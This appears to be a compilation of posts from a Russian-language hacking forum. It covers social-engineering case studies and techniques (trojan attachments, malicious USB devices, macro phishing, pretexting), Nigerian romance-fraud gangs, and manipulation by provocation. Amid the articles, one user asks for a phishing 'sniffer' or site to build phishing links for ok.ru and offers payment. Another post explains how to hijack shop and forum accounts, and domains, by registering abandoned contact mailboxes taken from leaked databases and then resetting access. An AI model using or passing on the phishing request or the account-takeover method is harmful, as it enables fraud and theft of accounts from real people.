120 000 каратов. Позже это дело признали одним из самых громких грабежей.
Мораль истории: неважно, какой вид технологии используется и насколько он дорог — пока есть человеческий фактор, система уязвима.
Зачастую, как в примере выше, социальному инженеру даже не требуется завоёвывать доверие «жертв» и управлять ими. Достаточно грамотно использовать информацию, которая у всех на виду: почта на рабочем столе, оповещения на экране телефона или мусор. Социальный инженер может получить данные, не оказывая давления на людей.
Кейс второй. Просто попроси
В 2015 году у компании The Ubiquiti Networks украли 40 миллионов $. Никто не
взламывал операционные системы. Никто не крал данные. Правила безопасности
нарушили сами сотрудники.
Мошенники прислали электронное письмо от имени топ-менеджера компании. Они
просто попросили, чтобы финансисты перевели большую сумму денег на указанный
банковский счёт.
Этот метод социальной инженерии играет на слабостях человека. Например, стремлении услужить начальству.
Психологи проводили эксперимент (подробнее в книге Роберта Чалдини «Психология влияния», 2009). От лица главного врача они звонили медсестрам, отдавая распоряжение ввести смертельную дозу вещества пациенту. Конечно, медсестры знали, что они делают, но в 95% случаев выполняли команду (на входе в палату её останавливали авторы исследования). При этом личность врача они никак не пытались подтвердить. Почему медсестры делали это? Послушание авторитету. То же случилось в истории The Ubiquiti.
Кейс третий. Фраза, которая потрясла Уолл-стрит
В апреле 2013 года в профиле Twitter информационного агентства The Associated
Press появился поддельный твит, который сильно ударил по мировой экономике.
На этих новостях обвалились биржевые индексы. Ситуация восстановилась, когда
Белый дом опроверг сообщение.
Ответственность за взлом аккаунта взяла на себя Сирийская Электронная
армия. Сообщалось также, что до этого хакеры от имени одного из сотрудников
AP рассылали «коллегам» письмо с просьбой перейти по очень важной ссылке. Там
у пользователя просили авторизоваться, введя логин и пароль. Так
злоумышленники хотели получить данные личных аккаунтов сотрудников редакции.
Данная ситуация показывает уязвимость перед подобными кибератаками. Сегодня
это The Associated Press, а завтра может быть любая другая компания, от лица
которой могут разослать вирусные сообщения, порочащие репутацию.
Преступники разрабатывают новые схемы, — представляются налоговыми
инспекторами и вымогают деньги для «погашения долга», или представляются
сотрудниками банка и требуют пин-коды.
Никакие обычные средства защиты (антивирусы, файрволлы) не помогут спасти от таких атак.
Важно создать различные варианты политики безопасности, обучить пользователей, определить правила пользования девайсами внутри компании. А также создать систему оповещения о возможности угрозы, назначить ответственных за техподдержку и организовать двойную проверку.
Популярные техники социальной инженерии
Троянский конь
Эта техника использует такие качества потенциальной жертвы, как любопытство и
алчность. Социальный инженер отправляет e-mail с бесплатным видео или
обновлением антивируса во вложении. Жертва сохраняет вложенные файлы, которые
на самом деле являются троянскими программами. Такая техника останется
эффективной до тех пор, пока пользователи продолжают бездумно сохранять или
открывать любые вложения.
Помимо вложений злоумышленники могут использовать USB-устройства (накопители и другую периферию).
В такой атаке, как и в случае с вложениями, злоумышленники эксплуатируют любопытство пользователя, который обнаружил флешку на парковке или получил её в подарок на мероприятии.
При подключении такого устройства компьютер определит его как клавиатуру. После этого флешка пошлет компьютеру команды для установки вредоносного программного обеспечения или кражи конфиденциальных данных. Со стороны пользователю будет казаться, что кто-то набирает на компьютере команды с клавиатуры.
Претекстинг
Претекстинг – это атака, проводимая по заранее подготовленному сценарию. Такие
атаки направлены на развитие чувства доверия жертвы к злоумышленнику. Атаки
обычно осуществляются по телефону. Этот метод зачастую не требует
предварительной подготовки и поиска данных о жертве.
Фишинг
Фишинг-атаки – это самый популярный вид мошенничества в социальной инженерии.
Целью фишинга является незаконное получение конфиденциальных данных
пользователей (логина и пароля). Для атаки пользователей злоумышленники
используют электронную почту, предварительно собрав из открытых источников
список работников компании и их имейл-адреса. После сбора адресов хакеры
переходят к подготовке письма с полезной нагрузкой.
Полезная нагрузка, как правило, может быть двух типов:
Для создания поддельной страницы злоумышленники копируют HTML- и JavaScript- код оригинального корпоративного ресурса и добавляют изменения, которые позволяют получать пароль и логин, вводимые пользователями.
В офисные файлы, как правило, добавляют вредоносный код, который выполняется при открытии. Для добавления кода используют стандартную функцию Microsoft Office — создание макросов. Запущенный документ скачивает исполняемый файл, который заражает рабочую машину пользователя и предоставляет взломщикам удаленный доступ для кражи информации.
Кви про кво
При использовании этого вида атаки злоумышленники обещают жертве выгоду в
обмен на факты. Например, злоумышленник звонит в компанию, представляется
сотрудником технической поддержки и предлагает установить «необходимое»
программное обеспечение. После того, как получено согласие на установку
программ, нарушитель получает доступ к системе и ко всем данным, хранящимся в
ней.
Tailgating
Tailgating или piggybacking подразумевает несанкционированный проход
злоумышленника вместе с законным пользователем через пропускной пункт. Такой
способ невозможно применять в компаниях, где сотрудникам необходимо
использовать пропуски для входа на территорию предприятия.
Очевидно, что социальная инженерия может нанести огромный ущерб любой организации. Именно поэтому необходимо принимать все возможные меры, для предотвращения атак на человеческий фактор.
Есть у кого ссылка на нормальный сниффер ? Те снифферы как s-sniff или
katsniff(не реклама) они не подходят. Так как там другие участники могут базу
тырить.
Нужен для ok.ru(не реклама) или сайт какой нибудь чтоб через него создать фиш
ссылку онлайн ?
Если кто знает подскажите и оставьте ссылочку на я.д
Если подойдёт закину на баланс
Предлагаю к вашему прочтению ОГРОМНУЮ библиотеку книг по психологии (Читать вы конэшно это не будете)
You must have at least 5 reaction(s) to view the content.
Всем привет сегодня поговорим про регистрацию в шопах и на бордах многие регистрируют на не существующие mail,жабы,ICQ и.т.д в принципе и сам так делаю о-чень часто аськи у меня не когда не было по этому пищу от пизды при реги.
Так вот если у Вас есть базы и точно знаете от куда они таким способ можно тупо угнать акк,также часто можно встретить в контактах жабы по типу fffffff@exploit.im то это точно не существующие контакты и все что Вам остается пойти её регнуть и восстановить доступ в тот же шоп-сс,борд или писать от этого чудака Вам пригодиться этот Emails checker да sockslist тут брал для теста вполне нормально отработали Все.
Надеюсь вы это уже поняли, что имея список контрольных ящиков к определенным доменам, этот список можно проверить на валидность, ведь наверняка со временем многие ящики устаревают и их удаляют.
Поэтому, узнав какие ящики свободны, мы можем без труда их зарегистрировать и восстановить на них доступ к домену! А на некоторых заброшенных ящиках, наверняка есть большое кол-во припаркованных и также заброшенных доменных имен, которые возможно только и ждут, чтобы вы стали их новым владельцем.
p.s тема не новая но может кому-то будет интересной
Нигерийские хакеры: ритуалы, жертвоприношения и сказочное богатство
19 октября 2018 года в нигерийском городе Эффурун погиб один полицейский и
серьёзно пострадал другой. Водитель не справился с управлением во время погони
за членом сообщества «Яхубой » (Yahoo boy) и разбился, тогда как
злоумышленник скрылся. По свидетельствам очевидцев, он вёл машину дорогой
марки — нередкое явление для тех, кто занимается киберпреступлениями в
Нигерии.
Предполагаемые участники интернет-сообщества «Яхубой», арестованные за
мошенничество полицией Бенина и Нигерии.
С каждым годом эта сфера привлекает молодых и талантливых выпускников
технических вузов, которые в попытке выбраться из бедности обращаются к
интернет-мошенничеству. Однако необычным это явление делает то, что
злоумышленники сочетают со своей деятельностью спиритизм. Они проводят
ритуалы, надрезая кожу на теле, похищают людей или в особых случаях идут на
убийства, веря, что магия поможет заработать больше денег на жертвах.
Где суеверия встречаются с технологиями
В августе 2018 года 29-летний житель нигерийского города Лагос и
предполагаемый яхубой Тайво Акинола (Taiwo Akinola) договорился со своей
матерью Элисой встретиться дома для важного разговора. Чуть позже молодой
человек попросил своего племянника купить в магазине носовой платок и пачку
сигарет, а сам отправился домой. Как говорится в материалах дела, дождавшись
мать, он напал на неё и ударил по голове доской с гвоздями.
После неопределённых действий с телом женщины, потерявшей сознание,
злоумышленник оставил её дома в луже крови и ушёл. Вскоре из магазина вернулся
племянник Акинола, увидел родственницу и позвонил в полицию, после чего
раненую отправили в реанимацию в тяжёлом состоянии, а нападавшего задержали.
На допросе Акинола заявил, что его попросили убить мать с целью «получить больше денег» от интернет-жертвы.
Click to expand...
В его квартире обнаружили фрагменты человеческого черепа, некую смесь тёмного
цвета, а также склянку с маслом и наклеенным ярлычком «Отправить обратно».
Средний возраст киберпреступников в Нигерии составляет от 22 до 29 лет: в
основном это образованные и технически подкованные люди, разбирающиеся в
тонкостях интернета. Больше 70% — выходцы из небогатых семей. Зачастую их
навыки кодинга уступают аналогичным навыкам европейских или американских
злоумышленников, поэтому они полагаются не на создание собственных вирусов,
лишь иногда применяя фишинг.
Их основной способ махинаций — социальная инженерия.
Втираясь жертве в доверие, злоумышленники узнают данные её банковских карт или обманом вымогают деньги.
Click to expand...
Подавляющее число целей они находят на сайтах знакомств, где, выдавая себя за
другого человека, знакомятся с жертвой и узнают об её финансовое положении.
Если собеседник белый, то злоумышленник также выдаёт себя за белого человека и
в доказательство присылает фото. Обычно это фотография случайного человека,
найденная в Фейсбуке.
Когда жертва хочет поговорить по телефону, думая, что общается с девушкой,
злоумышленник просит знакомых девушек подыграть. Зачастую неизвестные выбирают
цель среди жителей западных стран, особенно зажиточных женщин или мужчин в
возрасте.
Я всегда выдаю себя за солидного мужчину, который ищет жену. Порой я
рассказываю, как меня предала прежняя супруга, отняв имущество и детей. Всё
это подаётся под дружелюбным соусом и подкрепляется фотографиями, чтобы
убедить собеседника.
— член сообщества яхубоев
Порой жертве отправляют дорогие подарки, чтобы убедить её в серьёзных
намерениях собеседника, или знакомят с «семьёй» по телефону. Для этого
злоумышленник использует программу для изменения голоса, выдавая себя за
пожилую женщину (мать), или же просит подыграть подельника. Далее неизвестный
убеждает жертву, что уехал в другую страну, используя систему подмены
телефонного кода.
Находясь за границей, злоумышленник рассказывает, что его родственник заболел
и просит занять определённую сумму, которая варьируется в пределах 1000
долларов.
Получив её, он придумывает новые поводы, чтобы получить больше денег вплоть до момента, когда у жертвы их не останется.
Click to expand...
Это далеко не единственная стратегия, и более опытные злоумышленники
«подготавливают» жертву по несколько месяцев, прежде чем просить взаймы.
В начале 2018 года вице-президент американской компании по кибербезопасности
CrowdStrike Адам Мейерс (Adam Meyers) признал, что яхубои имеют влияние на
родине, а их внутренняя политика напоминает классическую мафию.
Когда ты вступаешь в организацию [яхубоев], то получаешь новое имя. У них
есть своя музыка и даже свой язык. В соцсетях полно фотографий, где они
щеголяют своими вещами. Вся идея строится на вопросе, зачем вкладывать тысячи
долларов для создания собственного вируса, если можно просто убедить
случайного человека совершить глупость?
— Адам Мейерс , вице-президент американской компании по
кибербезопасности CrowdStrike
Об арестах яхубоев известно немногое — порой они участвуют в крупных операциях
с иностранными хакерами, в том числе американскими, и попадают под прицел ФБР.
В августе 2018 года это закончилось арестом 29 нигерийских яхубоев.
Молодые нигерийцы в поисках успеха
Название «Яхубои» (Yahoo boys) отсылает ко времени, когда первые нигерийские
интернет-злоумышленники рассылали фишинговые письма через почтовый сервис
одноимённого поисковика. Несмотря на банальность, участники движения с
радостью приняли это название.
В 2009 году один из самых известных рэп-исполнителей Нигерии Олу Мэйнтейн (Olu
Maintain) в выпустил песню «Yahooze», клип на которую набрал больше трёх
миллионов просмотров. В ролике исполнитель в дорогой одежде разбрасывает
долларовые купюры, водит дорогие машины и выпивает с друзьями в ночных клубах.
Хотя прямая связь Мэйнтена с яхубоями не установлена, нигерийцы легко узнают
их по схожим манерам. Они часто открыто хвастаются своими заработками, громко
говорят на улицах, развязно себя ведут, водят дорогие и примечательные машины,
которые зачастую меняют на новые. Они главные гости ночных клубов и активные
клиенты уличных проституток. Нередко прохожие встречают на пути группу молодых
яхубоев, говорящих на собственном сленге. К примеру, в их речи встречается
фраза**«Maga don pay»** — «Дурак заплатил».
Отчасти именно эпатажность, свойственная яхубоям, привела к аресту ученика
средней школы Адаму. В августе 2017 года он приобрёл частный дом и
магазин, после чего сообщил радостную новость отцу. На вопрос, откуда он взял
деньги, сын ответил, что банк по ошибке присылает ему несколько миллионов в
местной валюте. Заподозрив обман, родственник Адаму сообщил о возможном акте
мошенничества в Комиссию по экономическим и финансовым преступлениям Нигерии.
Расследование показало, что подросток оказался связан с яхубоями и украл
сбережения с банковского счета фермера.
Полиция в доме Адаму (в центре) с его отцом.
Другие яхубои не допускают подобных ошибок. Одной из главных социальных
ценностей нигерийцев остаётся семья и её честь, и чем меньше у человека
возможности её посрамить, скрываясь за выдуманным онлайн-именем, тем лучше.
Член преступного сообщества говорит:«Я испытываю проблемы, потому что
скрываю правду [о своей деятельности] от родителей. Они не должны знать,
потому что очень строгие. Если узнают, то отдадут меня полиции без права на
залог.
Я возвращаюсь домой без машины. У меня три шикарных авто, но я паркую их у друзей».
Click to expand...
Рабочий стол яхубоя.
Как говорится в исследовании Университета Ибадана, наравне с традициями семьи
и родного дома, особенно в дальних и неразвитых регионах, многие нигерийцы
верят в святость магических обрядов. Несмотря на развитие технологий и
науки, страх перед магией затрагивает как пожилых, так и юных жителей страны.
Спиритизм проникает во все виды деятельности: местные бизнесмены верят,
что изготовление специального мыла магическим образом увеличивает продажи, а
солдаты полагают, что обряды защитят их от вражеских пуль или удара мачете.
Эти же суеверия успешно укоренились в местном интернете, проникнув в область
киберпреступлений и закрепившись в стратегии яхубоев.
Оккультизм как способ борьбы и обогащения
В Нигерии яхубоями называют почти всех злоумышленников, которые работают в
интернете. Но те, кто используют для мошенничества оккультизм, известны как
«Яхубои плюс» (Yahoo plus). Их воспринимают как своего рода интернет-
шаманов, контролирующих некие силы для обмана «белых людей».
Такое мнение неслучайно — злоумышленники крадут лишь у иностранцев или выходцев из богатых районов Нигерии, которых из-за зажиточности приравнивают к «белым».
Click to expand...
На тему применения оккультизма среди нигерийских интернет-злоумышленников
проводилось несколько научных исследований, последнее— в 2013 году. Они
построены на показаниях бывших и активных яхубоев, а также на наблюдениях
социологов, которые втёрлись в доверие к членам сообщества. На основе данных
стали известны примеры «кибер-ритуалов», однако их популярность среди
злоумышленников установить не удалось. Скорее всего, к методам оккультизма
прибегает лишь небольшая часть яхубоев, так как магия играет сакральную роль в
традициях Нигерии.
Зачастую для успешного «ритуала», который должен вынудить жертву моментально
отдать все деньги, авторам требуется лишь настоящее имя цели. Однако некоторые
участники прибегают к дополнительным методам: надрезают руку, которой держат
компьютерную мышь, и ставят ноги на черепаху, сидя за компьютером. Животное
якобы оказывает спиритическую помощь.
Другой ритуал заключается в использовании женщины как проводника между шаманом
и жертвой. Злоумышленники договариваются с помощницей, что она будет худеть до
тех пор, пока цель не отдаст все свои деньги. Среди яхубоев считается, что
успех обряда построен на том, как сильно похудеет девушка и сколько боли
испытает в процессе. О случаях смерти в таких ситуациях ничего неизвестно, так
как в критичных случаях помощница отказывается от участия.
Зачастую «проводник» состоит в отношениях с «шаманом» или становится его подругой после того, как он получает деньги от жертвы.
Click to expand...
Многие яхубои считают магию главным источником прибыли. Якобы без ритуалов
члены сообщества зарабатывают лишь на пропитание, одежду и смартфон, тогда как
ритуалы дают шанс заработать миллионы. Именно к этому и стремился Тайво
Акинола, когда попытался убить свою мать и воспользоваться её кровью для
ритуала.
Одним из самых опасных обрядов считается тот, где нужно натереть интимные
места девушки маслом или другим средством, после чего заняться с ней сексом.
Эти действия якобы «выкачивают» энергию девушки, но в результате она может
заболеть или её постигнет проклятие, которое не позволит ей добиться успеха до
конца жизни. Часто для таких процедур используют проституток, так как,
полагают яхубои, их жизнь не столь ценная.
В разговоре с изданиям Nigerian Monitor 26-летний яхубой рассказал, что
прибегал к спиритизму, когда у него заканчивались деньги. С помощью ритуалов
он якобы «влюбил» в себя интернет-жертву и вынудил отдать все деньги.
Иногда яхубои относят компьютеры или ноутбуки в местные храмы, чтобы получить дополнительную энергию для операций.
Click to expand...
В социологических исследованиях упоминается, что некоторые яхубои в
исключительных случаях ночуют на кладбищах для неких ритуалов. Известны
случаи, когда интернет-злоумышленники применяли человеческие ногти или кольца,
снятые с трупов, для обрядов.
Яхубои не считают интернет-мошенничество преступлением , а некоторые
воспринимают его как социальное правосудие по отношению к западным странам за
то, что в прошлом они угнетали Нигерию. В понимании злоумышленников жестокость
иностранцев достаточно большая, чтобы применять против них магию. Главное,
чтобы жертва была богата.
Несмотря на такую позицию, среди яхубоев встречается страх перед спиритизмом.
Некоторые опасаются, что чрезмерное использовании магии может навредить им или
их близким, тогда как другие отказываются от методов из уважения к традициям.
Возможно также, что часть людей банально не верит в спиритизм, используя
стандартные методы социальной инженерии, но не высказывает своё мнение из-за
опасений осуждения.
Вся эта тема с магией вуду действительно существует, я использовал её, но
остановился из-за боязни последствий. С помощью вуду деньги приходят быстрее.
У меня есть друзья, которые всё ещё используют магию, в неделю они
зарабатывают в два или три раза больше. [В ритуале] я использовал кольцо, мы
делаем надрезы. У меня есть друг, который использует кальян, заполненный
чёрным веществом. Он прячет его в своей комнате и проговаривает заклинания.
— бывший яхубой, ключевой информатор исследователей нигерийского университета
Obafemi Awolowo
Приёмы провокации
Если вам когда-нибудь доводилось сталкиваться с откровенными провокаторами, то вы наверняка помните этот опыт. И я уверен, у вас остались о нем не самые лучшие впечатления. А все потому, что провокаторы вынуждают людей говорить и делать то, что те никогда бы не сделали, находясь в спокойном, уравновешенном состоянии. Однако именно в этом смысл провокаций и заключается – заставить вас делать то, что нужно провокатору, но совсем не нужно вам. Поэтому необходимо уметь распознавать провокации, разбираться в них и грамотно на них реагировать. О том, как это делать, мы поговорим с вами в этой статье.
Что такое провокация
Для начала давайте выясним, что такое провокация.
Если говорить коротко, то провокация – это стимул, который с высокой вероятностью вызовет у того, на кого он направлен нужную реакцию. Дословно с латинского слово “провокация” переводится как “вызов”. И это действительно вызов для того, на кого направлена провокация. Ведь чтобы грамотно отреагировать на провокацию, её необходимо вначале распознать, а затем найти на неё нужный ответ. Очень важно не реагировать на провокацию, а именно отвечать на нее, то есть действовать обдуманно. А для этого необходимо иметь [а если вы не имеете, то развивать] самообладание, дабы не позволять вызванным провокацией эмоциям затмевать ваш рассудок и подталкивать вас к ошибочным поступкам.
Провокацию еще можно назвать хорошо продуманным и целенаправленным раздражителем, пробуждающим в людях определенные эмоции и чувства и толкающим их на необдуманные поступки.
Повторю, провоцировать человека, значит побуждать его к такому действию, которое он без внешнего стимула не стал бы совершать.
Click to expand...
Провокатор предугадывает поступок своей жертвы, планируя извлечь из него выгоду, которая может быть, как материальной, так и в виде психологического удовлетворения.
Как распознать провокацию
Иногда распознать провокацию бывает непросто. Но это всегда можно сделать,
есть быть внимательным ко всему, что происходит с вами и вокруг вас.
Чувство дискомфорта всегда сигнализирует о какой-то опасности. Обычно с провокаторами бывает некомфортно, даже если вы еще не понимаете, что перед вами именно провокатор, который вас провоцирует. Такой человек может вас раздражать, он может вызывать у вас чувство отвращения и вам захочется от него отстраниться. Это происходит потому, что провокатор лезет в вашу голову и душу без вашего согласия, он пытается взломать вашу психологическую защиту и обойти вашу рациональную осторожность.
Поэтому если вам не комфортно с каким-то человеком – это повод задаться вопросом:зачем он вам нужен, чтобы общаться с ним?
И еще более важный вопрос поставьте перед собой: зачем вы ему нужны, чтобы общаться с вами, уделять вам внимание и что-то для вас делать? Эти вопросы станут для вас началом распознания провокации.
Это происходит в тех случаях, когда вас провоцируют через позитивные мысли и чувства. Вас, к примеру, могут очень сильно хвалить, восхищаться вами, чтобы вы, поддавшись эмоциям, что-то сделали для провокатора в знак благодарности, что-то ему рассказали, что-то отдали и так далее. Или вам могут предложить какую-то выгоду, или интересную идею, от которой вы придете в восторг. А дальше уже вы сами будете делать то, на что рассчитывает провокатор. Здесь важно сохранять свою голову трезвой, помня о том, что просто так люди никогда ничего не делают. Им не свойственно делать другим хорошо без особой необходимости.
Поэтому нужно выяснить , какая у них необходимость в том, чтобы делать хорошо именно вам? Вот над ним я и предлагаю вам задуматься в той ситуации, когда вам будет очень хорошо с каким-нибудь человеком, особенно с незнакомым.
Вопросы – это главный инструмент мышления и поиска нужной информации.
Click to expand...
С их помощью можно не только распознать провокацию, но и грамотно ее отразить. Если вам задают такие вопросы, которые вынуждают вас раскрывать нежелательную для раскрытия информацию, вас скорее всего провоцируют. И наоборот, сами вы должны уметь задавать и задаваться вопросами, которые позволят вам разобраться в причинах того, что с вами происходит и в смысле поведения других людей. Спрашивайте людей о том, чего они хотят, чтобы иметь хотя бы приблизительное представление об их намерениях. Не бойтесь казаться подозрительным и осторожным – береженого Бог бережет. Старайтесь чаще задавать вопросы, а не отвечать на них, общаясь с другими людьми, чтобы контролировать ситуацию и показывать провокаторам, что вы крепкий орешек.
И последнее, что я вам советую делать – это просчитывать свои действия. Если провокацию сложно распознать – ее можно найти. Для этого необходимо просчитать причинно-следственные связи, чтобы понять – выгодно вам что-то делать или нет. Если не выгодно, то вероятно, что тот, кто вас побуждает к этим действиям – провокатор и манипулятор. Так что задействовав свое мышление и просчитав ситуацию на несколько шагов вперед, вы сможете избежать ненужных ошибок. Это не просто сделать, понимаю, ибо будущее не предопределённо и любые прогнозы могут оказаться ошибочными. Но это лучше, чем просто реагировать на слова и поступки других людей, не задумываясь о последствиях своих действий.
Вообще, мы многие поступки и слова людей можем отнести к провокациям. Ибо многое в нашем взаимодействии друг с другом можно назвать стимулом и даже вызовом. И многие раздражители, с которыми мы сталкиваемся, вынуждают нас действовать не удобным для себя образом. Поэтому важно обращать внимание прежде всего на намеренные, целенаправленные провокации, а лишь затем искать подвох в том, что с виду кажется вполне нормальным и естественным. Провокацией являются все те поступки и слова людей, которые могут причинить вам какой-то ущерб. Это ущерб необходимо оценивать до того, как вы его понесете. При явных, очевидных провокациях, это сделать легче. Помните о том, что провокация – это инструмент борьбы, вражды, соперничества, конкуренции. Поэтому в некоторых случаях распознать провокацию можно по явно враждебному намерению других людей в отношении вас. То есть, когда кто-то хочет что-то у вас отнять, что-то от вас получить, обойти вас в чем-то, переиграть – ищите в поведении этого человека элементы провокации.
Методы провокации
Теперь давайте поговорим о том, какие бывают методы провокации, чтобы лучше
понять принцип их работы.
1. Взять жертву на слабо.
Это довольно распространенный метод провокации, потому что он очень прост в
исполнении. Им даже дети пользуются. Все, что нужно сделать, чтобы этим
приемом спровоцировать человека – это усомнится в его способностях, его
честности и прочих качествах. Человек захочет доказать, что он – не слабак, не
трус, не лентяй, не дурак, не жадный, не бедный, не обманщик, не изменщик, не
вор, не убийца и так далее. И когда человек будет это делать – доказывать,
объясняться, оправдываться – он много лишнего расскажет и много не нужного для
себя сделает. Если эта провокация не очевидна для того, против кого она
направлена, то она становится в разы эффективнее. Но даже если люди понимают,
что их таким образом провоцируют, они все равно могут пойти на поводу у
провокатора, чтобы показать себя ему или другим людям с хорошей стороны.
2. Возвысить человека.
Это тоже очень хороший способ провокации. Увидев в человеке того, кем он не
является [но кем хотел бы быть], восхитившись этим и всячески это выделяя,
можно вызвать в нем желание и стремление соответствовать этому образу. Здесь
жертве провокации достаточно просто согласиться с мнением провокатора о том,
что он, жертва – умный, смелый, щедрый, практичный, ответственный,
современный, чтобы попасться в ловушку. Раз ты такой, каким хочешь себя видеть
и каким тебя видят другие люди – соответствуй этому образу и поступай так, как
должен поступать.
3. Конфликт.
Провокация конфликта – это самая распространенная и явная форма провокации. В
отличие от манипулятивных провокаций, этот способ побуждения людей к
определенным действиям часто можно распознать без особого труда, но при этом
многим людям очень сложно воздержаться от того, чтобы не поддаться на эту
провокацию. Все дело в сильных эмоциях – обиде, гневе, ненависти, страхе, с
которыми людям сложно совладать. От того-то прием “разделяй и властвуй”
актуален во все времена. Как показывает жизнь, спровоцировать конфликт между
людьми несложно, стравив их друг с другом. Нужно лишь вызвать в людях
определенные эмоциональное состояние и связанную с ним поведенческую реакцию.
Если хорошенько разозлить человека, обидеть или напугать, то он будет вести
себя предсказуемым образом. И если это поведение вызвать в нужное время в
нужном месте, то из него можно извлечь определенную выгоду. Смысл в том, чтобы
вынудить находящегося в возбужденном состоянии человека совершить ошибку.
4. Соблазн.
Человека можно спровоцировать на необдуманные действия и поступки, чем-нибудь
его соблазнив. Деньги, секс, статус – это одни из наиболее часто используемых
приманок для соблазнения людей. К примеру, большие деньги или их отсутствие
могут спровоцировать человека на преступление. Красивая женщина может
спровоцировать мужчину на измену, а чрезмерно настойчивый и хитрый мужчина с
помощью сказок о любви может спровоцировать женщину на уход из семьи. Желание
повысить свой статус в обществе может спровоцировать человека на предательство
близких людей. И последствия от таких поступков могут быть самыми разными, в
зависимости от того, кто и с какой целью соблазняет человека.
5. Стыд, вина.
Можно вызвать у человека чувство вины и чувство стыда и таким образом
спровоцировать его на поступки, с помощью которых он попытается загладить свою
вину перед кем-либо и исправить свои ошибки. Это манипулятивная провокация, то
есть, как правило, имеющая скрытые намерения. Впрочем, иногда провокатор может
открыто потребовать от своей жертвы компенсацию ущерба, не скрывая того, что
вся эта ситуация ему на руку.
6. Не тактичные [провокационные] вопросы.
Это довольно эффективный метод провокации. Он часто используется адвокатами в
суде и скандальными журналистами. Не тактично поставленный вопрос может
побудить человека сказать правду или совершить ошибку, которая ему будет
дорого стоить. Ведь желая опровергнуть недостоверную информацию, порой
откровенно лживую и циничную, человек выдает достоверную. Или его
эмоциональное состояние станет настолько неустойчивым из-за нахлынувших
чувств, что он перестанет вести себя разумно, начнет нервничать, волноваться и
обязательно допустит какую-нибудь ошибку.
К примеру, человека можно спросить о том, как давно он перестал употреблять алкоголь или наркотики, что подразумевает, что он вообще это когда-то делал, хотят на самом деле это может быть не так. И если человек будет невнимателен к вопросу и станет необдуманно на него отвечать, он своим ответом может подтвердить факт употребления алкоголя или наркотиков, сказав, что он давно их не употребляет. То есть, одно неверно произнесенное слово может сделать его бывшим алкоголиком и наркоманом. Или он может испытать негативные эмоции из-за такого вопроса и начать проявлять агрессию в отношении того, кто задал ему его. А это выставит человека в дурном свете и люди могут подумать о нем плохо, в том числе и то, что он действительно бывший наркоман с неуравновешенной психикой.
7. Радость.
Чего только не делают на радостях люди. Когда человека переполняют эмоции, он
начинает вести себя примитивно, принимая самые прямолинейные решения. Легче
всего испытывающим радость людям что-нибудь продавать. Когда люди испытывают
бурю позитивных эмоций, они не особо считают деньги. Главное, пробудить в
людях эти эмоции. Это можно сделать множеством способов. Например, посмотрите,
как хорошо различные распродажи провоцируют людей совершать покупки, в том
числе и ненужные.
8. Намеренное заблуждение.
Это уже более тонкий метод провокации, манипулятивный, имеющий множество
вариаций. Смысл его в том, чтобы намеренно ошибаться в чем-то, демонстрировать
свое заблуждение нужным людям и таким образом побуждать их поправлять тебя или
полностью опровергать. Это позволяет добиться от них выполнения какой-то
работы [работа над доказательством того, что вы ошибаетесь] или получения от
них ценной информации и вообще позволяет привлечь к себе внимание этих людей.
Таким образом, люди будут расходовать определенные ресурсы, поддавшись на
такую провокацию и раскрывать нужные сведения.
К примеру, я могу не знать адреса нужного мне человека и не хочу никого спрашивать об этом, чтобы не вызывать подозрений из-за своего любопытства. Но я могу намеренно назвать его ошибочный адрес в присутствии людей, которые, по моему мнению, его знают, чтобы они меня поправили и выдали мне нужную информацию. Или можно изложить настолько абсурдную информацию по какой-либо теме, что многих людей она сильно возмутит и они захотят ее опровергнуть, приведя в качестве доказательства ее ошибочности необходимые провокатору сведения. Так, в частности, можно узнать, из каких источников они черпают информацию и какими знаниями обладают в определенной области. В некоторых видах деятельности такая вот информация об источнике информации представляет большую ценность.
Социнженеры часто используют этот способ провокации для выуживания у своих жертв нужной информации.
Click to expand...
К примеру, они могут позвонить владельцу банковской карты, представиться сотрудником банка и уточнить нужную им информацию по карте. Но они не просто спросят у него о ней, это может вызвать подозрение, а выдадут частично верную информацию и частично неверную, ссылаясь на то, что потеряли остальные данные из-за, скажем, компьютерного сбоя. Человек, не желая иметь проблем с картой и банком и видя, что о нем и так уже частично известно, выдаст мошенникам недостающую информацию, после чего с его карты украдут деньги. Такой способ провокации имеет много форм и способов применения. Желание людей указать на чужие ошибки, заблуждения, ложь, а заодно и подчеркнуть свою осведомленность, нередко используется в своих интересах грамотными провокаторами.
9. Угроза.
Угрозы, как реальные, так и мнимые, тоже довольно часто используемый способ
провокации. Это более открытая и явная провокация. Расчет делается на
предполагаемую реакцию человека на угрозу в его адрес. Человек в таких случаях
может быть весьма предсказуем. Он может испугаться и отказаться от своих
амбиций, может пойти на уступки, может спрятаться, убежать, отступить, или
может проявить агрессию в ответ. Все эти виды реакций вполне могут оказаться
ошибочными, неуместными, непродуманными и неточными, особенно в тех случаях,
когда за угрозами провокатора ничего не стоит. Нужный провокатору результат
будет достигнут, если жертва поверит в реальность его угроз и испугается их.
10. Скандал.
Грязноватый, но весьма эффективный и распространенный метод провокации.
Скандалы – это прекрасный способ сфокусировать внимание людей на каком-то
вопросе, на который без скандала они бы никогда не обратили внимание.
Основная задача скандала – привлечь внимание и по возможности удерживать его как можно дольше. В процессе скандала людям навязываются определенные точки зрения на тот или иной вопрос, которые они начинают воспринимать как собственное мнение и на основании этого мнения люди впоследствии принимают решения, совершают вероятностно-предопределенные действия, ради которых и затевается провокация. С помощью хорошего скандала можно отвлечь внимание людей от действительно важных для них проблем и направить их недовольство в нужную провокатору сторону.
К скандалу большинство людей проявляют интерес потому, что их культурная среда изобилует разного рода скандалами. Многие люди в конфликтных ситуациях скатываются к скандалу, ибо не обучены к иному способу разрешения этих ситуаций. Поэтому для них это привлекательный стимул. На телевидении такой способ провокации пользуется большой популярностью. Разного рода ток-шоу, где постоянно происходят какие-нибудь скандалы, привлекают к себе внимание многих людей.
Как реагировать на провокации
Чтобы защититься от провокаций нужно грамотно на них реагировать. А грамотная
реакция – это не эмоциональная реакция, а обдуманный ответ.
Старайтесь не связываться с провокаторами, чтобы не подвергаться их воздействию, а если они сами на вас настойчиво нападают, то просто не замечайте их. Провокатор всегда рассчитывает на определенную реакцию с вашей стороны, он ждет, что вы ответите ему. Если этой реакции не последует – его усилия окажутся тщетными. Так что лучший ответ – это отсутствие всякого ответа. Если же вы не в состоянии контролировать себя настолько хорошо, чтобы не поддаваться провокациям, вам нужно работать над собой, самостоятельно или с помощью специалиста.
